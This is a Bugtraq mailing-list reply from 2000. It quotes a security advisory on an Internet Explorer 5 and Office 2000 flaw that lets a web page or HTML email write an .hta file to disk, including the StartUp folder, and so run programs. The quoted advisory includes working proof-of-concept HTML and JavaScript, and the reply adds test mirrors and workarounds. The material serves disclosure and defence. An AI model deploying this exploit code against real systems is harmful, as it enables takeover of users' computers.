Re: IE 5 and Excel 2000, PowerPoint 2000 vulnerability - executin g programs

[paul.rogers () MIS-CDS COM (Paul Rogers)]

Just verified the Excel 2000 one. FYI, I have placed NT4 versions of the
pages originally by Georgi Guninski at:

http://www.flumps.org/access.html - Access 2000 vulnerability
http://www.flumps.org/excel.html - Excel 2000 vulnerability

Haven't been able to test on Win2K yet.

An interesting point to note is that IE will prompt / disable (depending
upon your security settings) the Excel execution before actually executing
the OBJECT tag and JavaScript, unlike with the Access example.

This is probably due to IE executing associated files from the OBJECT tag
before sanity checking the execution. Where as with the Excel example, a
piece of JavaScript actually writes to the user's hard disk causing IE to
prevent this from executing until approved by the user.

The only workaround for the Excel example is to disable Run ActiveX controls
and plugins within IE's security settings (goodbye flash!). After
conversations with Georgi, AFAIK there isn't a workaround for the Access
example, except to dis-associate Office 2000 file extenstions (not an option
for 99% of Windows users!)

Cheers,

Paul Rogers,
Network Security Analyst.

MIS Corporate Defence Solutions Limited

Tel:            +44 (0)1622 723422 (Direct Line)
                +44 (0)1622 723400 (Switchboard)
Fax:            +44 (0)1622 728580
Website:        http://www.mis-cds.com/

> -----Original Message-----
> From: Georgi Guninski [mailto:joro () NAT BG]
> Sent: 27 June 2000 12:43
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: IE 5 and Excel 2000, PowerPoint 2000 vulnerability -
> executing programs
>
>
> Georgi Guninski security advisory #13, 2000
>
> IE 5 and Excel 2000, PowerPoint 2000 vulnerability -
> executing programs
>
> Systems affected: IE 5.01, Excel 2000, PowerPoint 2000, Win98
> - probably
> other versions, have not tested
> Risk: High
>
> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski is not liable for any damages caused by direct or
> indirect use
> of the information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
> Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98
> (suppose other versions are also vulnerable, have not tested) allow
> executing programs when viewing a web page or HTML email message - in
> the latter case at least with IFRAME.
> This allows taking full control over user's computer.
>
> Details:
>
> IE 5.01 allows getting dangereous ActiveX objects with the help of the
> <OBJECT> tag and Office 2000 applications.
> For example, the following code loads a .xla file:
> <object data="Book1.xla" id="sh1" width=0 height=0></object>
> where Book1.xla is just a .xls file renamed to .xla. The same
> result may
> be achieved with a .ppt or .xls file, probably other Office 2000 file
> types.
> The result is having an object in IE that has a method SaveAs().
> Suppose there are more dangerous methods, have little knowledge on
> Office 2000 objects.
> The SaveAs method may save the Excel Workbook (or Addin) or PowerPoint
> object in arbitrary location, including the Start Up folder.
> The content of the saved file is controllable and depends on
> the content
> of Book1.xla.
> If the saved file is for example a .hta file, it is possible
> to execute
> arbitrary programs on the user's computer.
>
> The code is:
> ---------------------------------------------------
> <object data="Book1.xla" id="sh1" width=0 height=0>
> </object>
> <SCRIPT>
> function f()
> {
> fn="C:\\georgi-xla.hta";
> sh1.object.SaveAs(fn,6);
> //sh1.object.SaveAs("C:\\windows\\Start
> Menu\\Programs\\StartUp\\georgi-xla.hta",6);
> alert(fn+" sucessfully written");
> }
> setTimeout("f()",5000);
> </SCRIPT>
> ---------------------------------------------------
>
> Demonstration is available at:
> http://www.nat.bg/~joro/sheetex.html
>
> Workaround: Disable Active Scripting or Disable Run ActiveX
> controls and
> plug-ins
>
> Copyright 2000 Georgi Guninski
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro

**********************************************************************
The information contained in this message or any of its attachments may be privileged and confidential and intended for 
the exclusive use of the addressee. If you are not the addressee any disclosure, reproduction, distribution or other 
dissemination or use of this communication is strictly prohibited.

The views expressed in this e-mail are those of the individual and not necessary of MIS Corporate Defense Solutions 
Ltd. Any prices quoted are only valid if followed up by a formal written quote.

If you have received this transmission in error, please contact our Security Manager on 44 (0) 1622 723400.
**********************************************************************